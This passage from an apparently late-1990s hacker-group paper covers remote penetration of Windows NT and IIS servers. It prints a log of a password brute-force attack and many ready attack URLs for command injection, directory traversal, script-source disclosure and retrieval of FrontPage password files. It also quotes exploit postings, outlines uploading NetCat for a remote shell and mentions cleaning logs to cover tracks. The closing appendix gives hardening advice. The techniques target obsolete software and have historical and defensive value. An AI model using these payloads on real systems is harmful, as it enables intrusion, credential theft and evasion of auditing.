passwords and call it quits. An accomplished intruder will construct his list of usernames by using the information gathering techniques discussed above. The password list the intruder will use will also be constructed from gleaned information. Starting with a bare bones list of passwords, and creating the rest based on the usernames. It comes as no surprise to security professionals to find passwords set to the username. An attacker can specify an IP addresses to attack or he can specify an entire range of IP addresses. NAT will diligently work to accomplish the task, all the while generating a formatted report. Below is an actual results file of a real NAT attack across the internet. Although permission was given for the Rhino9 team to perform this attack, the IP address has been changed to protect the test target. [*]--- Reading usernames from userlist.txt [*]--- Reading passwords from passlist.txt [*]--- Checking host: [*]--- Obtaining list of remote NetBIOS names [*]--- Attempting to connect with name: * [*]--- Unable to connect [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03 [*]--- Server time is Tue Oct 14 11:33:46 1997 [*]--- Timezone is UTC-4.0 [*]--- Remote server wants us to encrypt, telling it not to [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to establish session [*]--- Was not able to establish session with no password [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ADMINISTRATOR' [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `GUEST' [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ROOT' [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ADMIN' [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `PASSWORD' [*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `PASSWORD' [*]--- Obtained server information: Server=[AENEMA] User=[] Workgroup=[STATICA] Domain=[] [*]--- Obtained listing of shares: Sharename Type Comment --------- ---- ------- ADMIN$ Disk: Remote Admin C$ Disk: Default share D$ Disk: Default share E$ Disk: Default share HPLaser4 Printer: HP LaserJet 4Si IPC$ IPC: Remote IPC NETLOGON Disk: Logon server share print$ Disk: Printer Drivers [*]--- This machine has a browse list: Server Comment --------- ------- AENEMA [*]--- Attempting to access share: \\*SMBSERVER\ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ADMIN$ [*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$ [*]--- Checking write access in: \\*SMBSERVER\ADMIN$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$ [*]--- Attempting to access share: \\*SMBSERVER\C$ [*]--- WARNING: Able to access share: \\*SMBSERVER\C$ [*]--- Checking write access in: \\*SMBSERVER\C$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$ [*]--- Attempting to access share: \\*SMBSERVER\D$ [*]--- WARNING: Able to access share: \\*SMBSERVER\D$ [*]--- Checking write access in: \\*SMBSERVER\D$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\D$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\D$ [*]--- Attempting to access share: \\*SMBSERVER\E$ [*]--- WARNING: Able to access share: \\*SMBSERVER\E$ [*]--- Checking write access in: \\*SMBSERVER\E$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\E$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\E$ [*]--- Attempting to access share: \\*SMBSERVER\NETLOGON [*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON [*]--- Checking write access in: \\*SMBSERVER\NETLOGON [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON [*]--- Attempting to access share: \\*SMBSERVER\print$ [*]--- WARNING: Able to access share: \\*SMBSERVER\print$ [*]--- Checking write access in: \\*SMBSERVER\print$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\print$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\print$ [*]--- Attempting to access share: \\*SMBSERVER\ROOT [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\WINNT$ [*]--- Unable to access If you look closely at the results, you can clearly see the CONNECTED message which informs the attacker that the tool found a valid Username/Password combination. At this point, the intruder would just manually re-connect to that machine using the newly found username/password combination and launch his attack. This is the end of the remote penetration via NetBIOS section. Keep in mind that the techniques discussed above are neither static nor stand-alone. An intruder who has spent time learning how to penetrate NT based networks will become extremely creative and use not only the techniques above, but personal variations of those techniques. =================================================================== INFORMATION GATHERING AND PENETRATION VIA WEBSERVER =================================================================== Information gathering and remote penetration via a webserver is well known today due to the population explosion on the internet and the resulting dissemenation of information. When discussing remote penetration and information gathering on NT Webservers, we will focus on Internet Information Server, the webserver that comes bundled with NT4. Some of the information to be discussed will be somewhat outdated. We have included it due to the fact that during professional audits, the Rhino9 Team has come across companies that are still running older versions of software titles in their production environments. Lets begin by discussing information gathering techniques. We will discuss ways of getting information about the webserver under attack, as well as using the webserver to get information that could be used in other types of attacks. First we will discuss how one would retrieve the webserver software package and version on the target machine. Someone that is new to the security community might wonder why one would want the webserver version of the target machine. Every different version and distribution of software has different vulnerabilities attached to them. For this reason, an intruder would want to know the webserver software and version in question. The oldest technique used to acquire webserver software and version is to telnet to the target machine on the HTTP port. Once a telnet connection has been established, issuing a simple GET command would allow one to view the HTTP header information, which would include the webserver software and version being used. One who is not prone to using telnet, or does not wish to parse through the header information can use a couple of available tools. The first, and probably most popular tool amongst non-accomplished intruders is Netcraft. An intruder can visit www.netcraft.com and use their query engine to retrieve the webserver information from the remote target. Netcraft can also be used retrieve all known webserver hostnames. For example, if we wanted to find all of the webservers that belong to the someserver.com domain, we could use Netcraft's engine to query *.someserver.com, and it would return a listing of all of the webserver hosts in that domain. Other tools that can be used to retrieve webserver version include 1nf0ze by su1d and Grinder by horizon of Rhino9 (URLs to all tools discussed in this text can be found at the end of this document). Once the intruder has determined what webserver package he is up against, he can begin to formulate an attack plan. By using the techniques discussed below, the intruder could gain access to the server or gain information from the server to use in other attacks. Understand that this section is in no way a complete representation of all attacks, just the more common and well known ones. The first attack to be covered is the .bat/.cmd flaw. As this flaw was well documented with its public posting, it will be quoted below (author unknown, if the author is reading this, let me know so that proper credit can be given): The .bat and .cmd BUG is a well-known bug in Netscape server and described in the WWW security FAQ Q59. The implementation of this bug in Internet Information Server beats all scores. Let's consider fresh IIS Web server installation where all settings are default: 1) CGI directory is /scripts 2) There are no files abracadabra.bat or abracadabra.cmd in the /scripts directory. 3) IIS Web server maps .bat and .cmd extensions to cmd.exe. Therefore registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ScriptMap has the following string: .bat or .cmd=C:\WINNT35\System32\cmd.exe /c %s %s In this case a hacker with a malicious intent can send either one of the two command lines to the server: a) /scripts/abracadabra.bat?&dir+c:\+?&time b) /scripts/abracadabra.cmd?&dir+c:\+?&time and the following happens: 1) Browser asks how you want to save a document. Notepad.exe or any other viewer would do for this "type" of application. 2) Browser starts the download session. The download window appears on the screen. 3) The hacker clicks the "cancel" button on the download window, because the "time" command on the server never terminates. 4) Nothing is logged on the server side by the IIS Web server, because the execution process was not successfully terminated!!! (Thanks to the "time" command.) The only way to see that something happened is to review all your NT security logs. But they do not contain information like REMOTE_IP. Thus the hacker's machine remains fully anonymous. Let's resume: 1) IIS Web server allows a hacker to execute his "batch file" by typing /scripts/abracadabra.bat?&COMMAND1+?&COMMAND2+?&...+?&COMMANDN In a similar situation with the Netscape server, only single command can be executed. 2) There is no file abracadabra.bat in /scripts directory, but .bat extension is mapped to C:\WINNT35\System32\cmd.exe In a similar situation with the Netscape server, actual .bat file must exist. 3) In case a hacker enters a command like "time" or "date" as COMMAND[N], nothing will be logged by IIS Web server. In a similar situation with the Netscape server, the error log will have a record about remote IP and command you trying to execute. If you are having trouble seeing exactly what is going on in this situation, an intruder could use the above attack sequence to create and execute files server side. This could have really drastic results depending on the skill level and intent of the attacker. Luckily, most production environments are no longer running versions of Internet Information Server old enough to still be affected by this flaw. Shortly after the bat/cmd flaw was fully investigated and documented, another bug hit the community. Again, lucky for us this flaw also only affects older version of Internet Information Server. This flaw, called the 'double dot bug' gave the visitor to the website the ability to break out of the sanctioned webroot directory and browse or download files. Obviously the end server could contain sensitive information that exists outside of the designated webroot, and this simple flaw would give an outsider access to that information. The command is executed as a URL, and its structure is as follows: http://www.someserver.com/..\.. As if the double dot bug was not enough, another variant on that flaw appeared shortly after. This newly found flaw would give an intruder the ability to execute scripts on the target machine. Due to the fact that this new flaw is a variant of the double dot bug, the scripts in question could exist outside of the webroot. This attack is also structured as a URL, and is issued as follows: http://www.someserver.com/scripts..\..\scriptname WindowsNT installations of Internet Information Server require some type of account to be used for authentication on the box for public visits. If this account was not present in some fashion, every visitor to the site would be required to present credentials. This would not be a very effective or efficient way to present a public website. On Internet Information Server, the account to be used is the IUSR_ account. This account and its accompanying password are created during installation. By default, this account is a member of the everyone group, and by default the everyone group has read access to everything on an NT drive. This fact coupled with the above mentioned flaw's ability to break out of the webroot could lead to major security breaches. For a short while, it seemed that new URL related attack types seemed to pop up every week. Following the scripts flaw above was another script related bug that would allow an intruder to create a file on the target machine, and possibly execute the file after creation. The new attack URL structure was: http://www.someserver.com/scripts/script_name%0A%0D>PATH\target.bat When this flaw first appeared, many people in the community ignored it and gave it no serious thought. Soon after, a public release was made documenting the exact steps an intruder would take to obtain a copy of the repair SAM. The release including the above URL flaw as part of its overall attack. When Microsoft released Internet Information Server 3.0, it brought active server page technology to the world. This release also opened the gates to a new stream of flaws that affected IIS and NT4. Active server pages brought simple, dynamic webpages to the Microsoft world. Active Server Pages can be used in many different ways, such as database connectivity, indexing and searching documents, authentication, and simple graphics rotation for those annoying advertisement banners. The concept of active server pages was actually pretty creative. The HTML code would include imbedded script code that would execute server side and produce dynamic content for the end user. With this new technology widely available, it was not long until the first flaw was released to the public. This first flaw, dubbed the 'dot flaw', would allow an intruder to actually view the script without the server executing it. A standard URL structure would look like this: http://www.genericserverhere.com/default.asp The attack URL structure would look like this: http://www.genericserverhere.com/default.asp. This attack would display the unexecuted code in the attackers web browser. Needless to say, the script code could contain sensitive information, such as a username/password combination to remotely connect to a database. This type of information, among other things, is not something that one would want an intruder getting their hands on. When a fix was released for the dot flaw, variants of the flaw that defeated the fix were also released. The first of the variants was the %2e flaw. %2e is the hex equivelant of a period, thus showing that the fix that was made available was not incredibly robust. Variants of this flaw continue to show up on occasion. Because all of the variants perform the same exact end results, they will not be discussed in detail. Some of the known attack URL structures are listed below: http://www.someserver.com/default%2easp http://www.someserver.com/default%2e%41sp http://www.someserver.com/default.asp::$DATA http://www.someserver.com/shtml.dll?.asp Everyone involved in the security community has a feeling that these will not be the last script displaying methods to emerge in the near future. As these scripts become more and more commonplace, they will contain more and more sensitive information. These simple exploits could lead to an intruder easily gleaning sensitive information. When it comes to gleaning information from IIS, perhaps one of the most popular and easiest of the attacks is the Index Server attack. Index Server is a small compact search engine module that was included with Internet Information Server version 3.0. This module gives webmasters the ability to provide visitors to their site with a searchable interface for searching the contents of the website. Although there are no inherent problems with Index Server itself, problems arise out of a lack of education on the part of the admin or webmaster. Index Server is not difficult to understand, setup and mantain, although its use of catalogs and scopes can lead to an admin misconfiguring the permissions and searchable content. This misconfiguration could lead to an intruder gaining access to information he would normally have a much more difficult time getting. The default URL structure for this attack would be: http://www.someserver.com/samples/search/queryhit.htm This path reflects the default path to the sample pages that ship with Internet Information Server. If this path is not a valid path, the intruder could still click on that helpful little "Search This Site" link to access the same information. Once the intruder successfully reaches the html document in question, he will be presented with a webpage containing a form field. This form field is where a visitor to your site would normally input the information he wished to search for. An intruder could use a filename search string such as: #filename=*.txt This would instruct Index Server to search through its catalog of indexed data for any files ending with that file extension. Keep in mind that this file extension is not limited to extensions that Index Server understands. If Index Server encounters a file type it does not understand, it will treat it as a binary and index the filename, extensions, date, and other attributes. This means that an intruder could search for anything, including *._, which could bring up the repair sam. The interesting thing about Index Server is that unlike other full blown internet search engines, Index Server will not display a file for which the requester does not have permission to access. In other words, if Index Server returns the fact that it found a file, then the file is accessable. Another favorite default function an intruder would attempt to access is Internet Information Servers web admin interface. In a default installation of IIS, the web admin interface resides in the 'iisadmin' sub directory of the web root, which means the URL attack structure would be: http://www.someserver.com/iisadmin If the admin has somehow misconfigured the permissions on this interface, then an intruder could gain unauthorized access to the web server with administrative functions. If successful, the intruder would be presented with an HTML interface to an administrative tool. Because of the way IIS and NT handles permissions, it is possible for the intruder to gain access to the interface but not have the proper permissions to actually do anything with it. So if you are auditing your own network, be sure to attempt a minor change to ensure that there is a problem. In late '97 and early '98 an enormous amount of webserver hacks were performed. A large number of those hacks had one thing in common: the webservers were running Microsoft Frontpage Extensions. Frontpage Extensions are little 'web bots', if you will, that allow the author or administrator of the website to perform complex or involved tasks with relative ease. The problem with the Frontpage Extensions was that a default Frontpage installation was not secure, especially in the unix version. An alarming number of the servers supporting these extensions had been left unpassworded or enabled administrative rights to the Everyone group. Again, the everyone group means everyone, including anonymous connections. We will dive into the first Frontpage attack with a discussion of an attack using the actual Frontpage client software. A server that supports FrontPage will have a number of working directories that begin with the letters '_vti'. Doing a search at any of the popular search engines for any of the default frontpage directories would result in a large number of returns from the engine. An intruder could then get comfortable and attempt a simple, repetative attack against these servers. The attack is executed as follows: 1- Open your own personal copy of FrontPage 2- Goto the "Open frontpage web" dialogue box 3- Put in the URL or IP of the server you wish to attack If the server is unpassworded or if permission is granted to the everyone group, Frontpage will open the remote site for you, and allow you to alter it. The attack really is this simple. If the extensions are set up correctly, a username/password dialogue would appear. The intruder may attempt some basic combinations such as administrator/password, but chances are the intruder won't bother, and will move on. An intruder could also use the same "open frontpage web" trick to get a complete user listing. This could be used in brute force attacks later. Documentation circulated explaining that to stop the gleaning of usernames this way, one should create a restriction group as FP_www.yourdomain.com:80. This new restriction group indeed works, unless the intruder uses the IP address of your server instead of the domain name. Some other tricks that can be done with FrontPage support is attempting to grab the Frontpage password file. Frontpage normally stores the password in the _vti_pvt directory, with the name service.pwd. An intruder could attempt to execute the following URL: http://www.someserver.com/_vti_pvt If permissions are not setup correctly and directory browsing is allowed, the intruder would get a listing of the files in that directory, including service.pwd. Usually the administrator will pay some attention to the installation and security of the site and restrict access to that directory. Although this is a good initial step, always remember how NTFS works. Depending on the configuration of NTFS, a user may still gain access to the password file even though access to the parent folder has been denied. In this type of situation, the intruder would simply issue the full path to the file in the URL, such as: http://www.someserver.com/_vti_pvt/service.pwd Although the frontpage password file is encrypted, it is encrypted with standard DES, so any DES cracker can glean it after proper file doctoring. An intruder may also poke around the other _vti directories, as sometimes these can hold sensitive information. After the username is known and the password has been cracked, the intruder could then re-connect with his copy of Frontpage and provide it with the credentials, or the credentials could be used in other ways, such as mapping a network drive, provided the same username/password combination would work in that context. (NOTE: Service.pwd is not the only known password file name. Authors.pwd, admin.pwd, users.pwd and administrators.pwd have also been seen.) Of the Frontpage related exploits, the binary ftp exploit is probably considered to be the most sophisticated, even though it's also extremely easy to accomplish. The binary attack would allow an intruder to execute any binary via frontpage extensions. The attacker must find a server that supports frontpage and also supports FTP anonymous writable. After connecting to the server via FTP, the intruder would create a directory named _vti_bin. He would then upload whichever executable he wishes to run into the newly created directory. Once the executable file has been uploaded, the intruder would issue the following URL: http://www.someserver.com/_vti_bin/uploaded_file The server will then be more than happy to execute the file for the visitor of the site. Shortly after the binary attack made its rounds, the _vti_cnf bug was found. This would allow an intruder to view all files in a certain directory. By replacing the index.html with _vti_cnf, the intruder would see all files in that directory, and possibly gain access to them. The attack is issued as follows: Standard structure - http://www.someserver.com/some_directory_structure/index.html Attack structure - http://www.someserver.com/some_directory_structure/_vti_cnf It may seem as though there could be countless variants of the same attack type that could issue similar results. Sadly enough, that is a somewhat accurate statement. Many of these flaws are found by people playing with variants of previous flaws, but not all flaws affecting NT web services come from Internet Information Server. There are other web server software packages that will run on NT, like the well known Apache web server. Of course, with these third party web server packages and seperately released scripts that run on these third party packages, new flaws are bound to show up. Webcom Datakommunikation released a cgi script that would allow visitors of a website to sign a guestbook. The name of the cgi script is wguest.exe. By issuing the proper commands, this little cgi script allows an attacker to view any text file on your server. The form page where a visitor would sign the guestbook contains a number of hidden fields. One of these hidden input fields is as follows (as reported by David Litchfield): input type="hidden" name="template" value="c:\inetpub\wwwroot\gb\template.htm"> or input type="hidden" name="template" value="/gb/template.htm"> Template.htm here is the file that will be displayed by wguest.exe after the user has entered his information. To exploit this an attacker views the source and saves the document to his desktop and edits this line by changing the path to whatever file he wants to view, eg. input type="hidden" name="template" value="c:\winnt\system32\$winnt$.inf"> [If an unattended install was done the admin password can be gleaned from this file] He then clicks on "Submit" and then wguest.exe will display this file. This was not tested with pwl files. However the attacker must know the exact path of the file he wishes to view. Another 'generic' HTTPD exploit involves a third party webserver product that runs on WindowsNT called Sambar Server. The following is a direct quote from posting: It is possible to view the victim's HDD. Asume you find a computer running Sambar Server by searching the Internet with these key-words: +sambar +server +v4.1 If you find a site like: http://www.site.net/ then do a test, run a little perl script... http://www.site.net/cgi-bin/dumpenv.pl Now you see the complete environment of the victims computer, including his path. Now you can try to login as the administrator by this url: http://www.site.net/session/adminlogin?RCpage=/sysadmin/index.stm The default login is: admin and the default password is blank. If the victim hasn't changed his settings, you now can control his server. Another feature is to view the victims HDD. If you were able to run the perl script you should also be able (in most cases) to view directory's from his path. Most people have c:/program files and c:/windows in the path line, so what you can do is: http://www.site.net/c:/program files/sambar41 The next small item in this section has to do with Netscape Enterprise Server. Some versions of the software react to the ?PageServices parameter by allowing users access to a directory listing. http://www.site.net/?PageServices is how this would be done. Finally a word on FTP. FTP can be a secure thing. Tons of people will argue that platforms and version dependancy make it more secure, and for the most part this is true. Most seasoned security profressionals will tell you that version and platform do not amount to anything without an educated end admin. We are adding this quick note in here due to the number of servers Rhino9 has been able to penetrate based on FTP permissions. Some admins will not notice, or understand, the "Anonymous world writable" privs on their webserver. Rhino9 has questioned and worked its way into an entire network via one misconfigured FTP server. It is not difficult to upload NetCat via anon-ftp-writable to a server, execute it via URL, and bind it to a port. From that point on, you have a remote 'shell' on the NT box. By connecting to that remote NetCat bind, keep in mind that all command line functions issued from that shell seem to be sent from THAT SHELL, with the NetCat binding running in the context of an internal user. =================================================================== MISCELLANEOUS INFORMATION GATHERING AND PENETRATION TECHNIQUES =================================================================== (As with any type of security related document that attempts to encompass many different topics, some topics will seem out of place among the rest of them. This section deals with different techniques that really did not fit anywhere else in the document. Excuse the somewhat fragmented nature of this section.) If there is one product that Rhino9 as a team has spent time tearing apart, it is WinGate. The first problem encountered with WinGate was the ability to 'bounce' through a WinGate with all subsequent connections appearing to come from the WinGate itself. This little flaw was extremely easy to take advantage of. One would telnet to the WinGate port and be presented with a prompt such as: WinGate> At this prompt, you could issue a seperate telnet command or take advantage of the WinGates SOCKS ability to establish other connections. While the developer of this software product was quick to release fixes and bulletins for this, the next release also had problems. In a default installation of WinGate v2.1, the WinGate machine was configured with a logging service. The logging service listens on port 8010 of the WinGate machine. By establishing an HTTP connection to this port, a possible intruder would be presented with two general feeds: "Connection Cannot Be Established" Or, the intruder would get a listing of the wingate machines hard drive. Keep in mind, that this is a default install and can easily be fixed by chaning the default install configuration. As Exchange server became a more and more popular mail server package, flaws began to appear. The first flaw to emerge was a password caching problem within the architecture of Exchange. This is a quote directly from the original posting: Create a user xyz on your NT domain with an Exchange 5.0 server with POP3 service. Set xyz's password to a1234. Things work fine so far. Now change xyz's password to b5678. You will find that POP3 mail clients can log in using either password a1234 or b5678 for user xyz. Now change the password to something else. You will find that a POP3 client (or direct telnet to port 110) will allow you to log in as xyz using any of the three passwords. They all work. The Exchange 5.0 service POP3 connector caches passwords in a non-hashing mechanism so that all the passwords remain active. This does not affect the new web page interface to get your mail which uses a different authentication. Nor does it affect NT logons. In non-POP3 logins, the passwords are not cached (except NNTP and LDAP). As you can see, the caching problem can be very serious in certain environments. Another technique that an intruder could use to gather information is based on the SMTP port of a target mail server. In order to be SMTP compliant and have the ability to fully interact with other mail entities on the internet, NT based SMTP mail servers understand the verify feature. By establishing a telnet session to the SMTP port of the mail server, an intruder could issue the verify command in conjunction with a username. If the verify feature is enabled, the server will tell the intruder if it is a valid username or not. The attack command would appear as such: vrfy administrator (would verify if a user named administrator existed) On some mail systems, the intruder would be required to go through the HELO sequence first, but this is extremely trivial. Needless to say, this could lead to an intruder gathering a list of valid usernames to use in other attacks. =================================================================== FINAL WORDS =================================================================== The authors of this document hope that you have enjoyed reading it and that you have learned something from it. The authors would also like to remind the readers that we wish to keep this document current. Planning future releases of this document, with up to date information allows us to begin keeping a publicly available living record that administrators and security professionals can use. Send your information gathering and remote penetration techniques to neonsurge@hotmail.com. As new versions of this document become available, notice will go out on such lists as NTBugTraq. The home of the document itself will be at the Rhino9 website (http://rhino9.ml.org), The authors of this document have three other documents planned for release in the near future, all of them part of the NT WarDoc series. We have an indepth Denial of Service paper in the works, Local Penetration Techniques paper, and a paper dealing with techniques one could use to gaurd against the topics of the other papers. We look forward to feedback from the community. =================================================================== APPENDIX A: THE NET COMMAND =================================================================== Below is a listing of all Net commands and their functions: Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements. Net Computer: This adds or deletes computers from a domains database. Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services. Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command. Net File: This command lists the open files on a server and has options for closing shared files and removing file locks. Net Group: This displays information about group names and has options you can use to add or modify global groups on servers. Net Help: Help with these commands Net Helpmsg message#: Get help with a particular net error or function message. Net Localgroup: Use this to list local groups on servers. You can also modify those groups. Net Name: This command shows the names of computers and users to which messages are sent on the computer. Net Pause: Use this command to suspend a certain NT service. Net Print: Displays print jobs and shared queues. Net Send: Use this command to send messages to other users, computers, or messaging names on the network. Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions. Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares. Net Statistics Server or Workstation: Shows the statistics log. Net Stop: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service may stop other services. Net Time: This command is used to display or set the time for a computer or domain. Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources. Net User: This command will display a list of user accounts for the computer, and has options for creating a modifying those accounts. Net View: This command displays a list of resources being shared on a computer. Including netware servers. **Special note on DOS and older Windows Machines: The commands listed above are available to Windows NT Servers and Workstation. DOS and older Windows clients have these NET commands available: Net Config Net Diag (runs the diagnostic program) Net Help Net Init (loads protocol and network adapter drivers.) Net Logoff Net Logon Net Password (changes password) Net Print Net Start Net Stop Net Time Net Use Net Ver (displays the type and version of the network redirector) Net View =================================================================== APPENDIX B: AN EXAMPLE OF THE SID TOOLS IN USE =================================================================== Below is an example of the SID Tools in action, quoted directly from the public posting about this tool: This flaw works with the User2Sid and Sid2User utilities. The utilities make function of the LookupAccountName and LookupAccountSid WIN32 Functions. These functions must be executed by a user with EVERYONE access, not very hard to accomplish. Here's what happens: 1) Looking up a SID of any domain account, for example Domain Users user2sid "domain users" S-1-5-21-201642981-56263093-24269216-513 Now we know all the subauthorities for the current domain. Domain accounts only differ by the last number of the SID, called a RID. 2) Looking up the built-in administrator name (RID is always 500) sid2user 5 21 201642981 56263093 24269216 500 Name is SmallUser Domain is DomainName Type of SID is SidTypeUser Now it is possible to look up all the domain accounts from the very first one (RID = 1000 for the first account, 1001 for the second and so on, RIDs are never used again for the current installation). sid2user 5 21 201642981 56263093 24269216 1000 sid2user 5 21 201642981 56263093 24269216 1001 ... Remember that the anonymous account is also part of the Everyone group. It also happens that the anonymous account is not audited by the logon/logoff feature. Below is an example of what you can learn provided the netbios ports are open (the listing is fictional). nslookup www.xyz.com Non-authoritative answer: Name: www.xyz.com Address: net use \\\ipc$ "" /user:"" The command completed successfully. user2sid \\ "domain users" S-1-5-21-201642981-56263093-24269216-513 Number of subauthorities is 5 Domain is XYZ_domain Length of SID in memory is 28 bytes Type of SID is SidTypeGroup sid2user \\ 5 21 201642981 56263093 24269216 500 Name is XYZAdmin Domain is XYZ_domain Type of SID is SidTypeUser sid2user \\ 5 21 201642981 56263093 24269216 1000 Name is Domain is XYZ_domain Type of SID is SidTypeDeletedAccount sid2user \\ 5 21 201642981 56263093 24269216 1001 Name is Simpson Domain is XYZ_domain Type of SID is SidTypeUser sid2user \\ 5 21 201642981 56263093 24269216 1112 LookupSidName failed - no such account Default NT Install SID's are: DOMAINNAME\ADMINISTRATOR S-1-5-21-917267712-1342860078-1792151419-500 (=0x1F4) DOMAINNAME\GUEST S-1-5-21-917267712-1342860078-1792151419-501 (=0x1F5) Built-In Global Groups DOMAINNAME\DOMAIN ADMINS S-1-5-21-917267712-1342860078-1792151419-512 (=0x200) DOMAINNAME\DOMAIN USERS S-1-5-21-917267712-1342860078-1792151419-513 (=0x201) DOMAINNAME\DOMAIN GUESTS S-1-5-21-917267712-1342860078-1792151419-514 (=0x202) Built-In Local Groups BUILTIN\ADMINISTRATORS S-1-5-32-544 (=0x220) BUILTIN\USERS S-1-5-32-545 (=0x221) BUILTIN\GUESTS S-1-5-32-546 (=0x222) BUILTIN\ACCOUNT OPERATORS S-1-5-32-548 (=0x224) BUILTIN\SERVER OPERATORS S-1-5-32-549 (=0x225) BUILTIN\PRINT OPERATORS S-1-5-32-550 (=0x226) BUILTIN\BACKUP OPERATORS S-1-5-32-551 (=0x227) BUILTIN\REPLICATOR S-1-5-32-552 (=0x228) Special Groups \CREATOR OWNER S-1-3-0 \EVERYONE S-1-1-0 NT AUTHORITY\NETWORK S-1-5-2 NT AUTHORITY\INTERACTIVE S-1-5-4 NT AUTHORITY\SYSTEM S-1-5-18 =================================================================== APPENDIX C: RELATIONAL LOCATIONS OF DEFAULT IIS STRUCTURES =================================================================== C:\InetPub\wwwroot C:\InetPub\scripts /Scripts C:\InetPub\wwwroot\_vti_bin /_vti_bin C:\InetPub\wwwroot\_vti_bin\_vti_adm /_vti_bin/_vti_adm C:\InetPub\wwwroot\_vti_bin\_vti_aut /_vti_bin/_vti_aut C:\InetPub\cgi-bin /cgi-bin C:\InetPub\wwwroot\srchadm /srchadm C:\WINNT\System32\inetserv\iisadmin /iisadmin C:\InetPub\wwwroot\_vti_pvt /_vti_pvt C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM Internet Information Index Server sample C:\Program Files\Microsoft FrontPage\_vti_bin C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm /iisadmin/isadmin Frontpage specific files and their functions: /_vti_inf.html Ensures that frontpage server extensions are installed. /_vti_pvt/service.pwd Contains the encrypted password files. Not used on IIS and WebSite servers. /_vti_pvt/authors.pwd On Netscape servers only. Encrypted. Names and passwords of authors. /_vti_pvt/administrators.pwd /_vti_log/author.log If author.log is there it will need to be cleaned to cover an intruders tracks. =================================================================== APPENDIX D: THE SERVICES =================================================================== I have received countless pieces of mail regarding the NT services. People are asking what they do and should certain ones be disabled. Whats follows is a list of the services, an explanation of each one, and recommendations for setup. -NeonSurge ALERTER: Relies on NetBIOS over TCP/IP for network communication. This service allows a user to receive messages from other machines. These messages could be warnings or some type of pre-determined network information. I recommend disabling the Alerter service on machines due to its NetBIOS dependancy and the fact that it is hardly ever used. CLIPBOOK SERVER: Relies on NetBIOS over TCP/IP for network communication. This server service allows the contents of the clipboard to be shared over a network. Few use it, and it should be disabled due to the ability of a remote intruder possible gleaning information from it. COMPUTER BROWSER: The Computer Browser service allows one to view available network resources by browsing via Network Neighborhood. When active on a server, the server will register its name through a NetBIOS broadcast or directly to a WINS server. I recommend disabling this service. DHCP CLIENT: This service should be set to automatic if the machine is a dhcp client, if not, disable it. DIRECTORY REPLICATOR: This service allows NT systems to import and export directory contents. If you content replication is not needed, disable this service. EVENT LOG: I recommend always using this service because it is the service responsible for logging activity on the server, including security activity. LICENSE LOGGING SERVICE: Used to track use of licenses by different applications, it does not have any serious impact on the network and should be set to automatic (which is the default setting). MESSENGER SERVICE: Relies on NetBIOS over TCP/IP for network communication. Similar to the Alerter service in both design and function. I recommend stopping this service to prevent username enumeration via NBTSTAT commands. NET LOGON: This service is used by both Server and Workstation to provide for user authentication. TSERhis service is said to be required at all times and runs as the built in SYSTEM user. NETWORK DDE and DDE DSDM: These service provide dynamic data exchange. DDE is used for such applications as Chat (thats important!), and other applications that may require this type of functionality. These services are considered to be a moderate risk due to their TCP connection accepting states. NETWORK MONITOR AGENT: Network Monitor Agent is used to monitor, or sniff, the traffic passing through a network adapter card. If the SMS version of this software is in use, an administrator can remotely monitor traffic on other network adapter cards. NT LM SECURITY SUPPORT PROVIDER: This service is present to help with backwards compatibility and authentication with older software packages. PLUG AND PLAY: Used to configure PnP devices. REMOTE PROCEDURE CALL LOCATOR AND SERVICES: RPC is a protocol that is used to encapsulate fucntion calls over a network. Its defualt configuration, automatic, is standard and should be left alone. This service is considered to pose a high security risk, but the dependancies existing on this service are too great to disable it. ROUTING AND REMOTE ACCESS SERVICE: This is an add-on service that enhances the functionality of WindowsNT. If you are using a modem to dial-out of your NT system, this service should be set to automatic. If you are using its routing features, also set it to automatic. SCHEDULE: This service allows an application to be executed at a pre-specified time and date. This can pose a serious security threat as this service can be used to start applications under the SYSTEM context. SERVER: Used as the key to all server-sdie NetBIOS applications, this service is somewhat needed. Without this service, some of the administrative tools, such as Server Manager, could not be used. If remote administration or access to the machine is not needed, I highly recommend disabling this service. Contrary to popular belief, this service is NOT needed on a webserver. SPOOLER: The spooler service is used to accept requests for print jobs from clients, and to allow the local system to spool jobs to a network printer. This service should be set to automatic. TCP/IP NETBIOS HELPER: This service helps and enhances NBT and the Net Logon service. Because the Net Logon service should be set to automatic, so should this service. TELEPHONY SERVICE: This service is used to manage 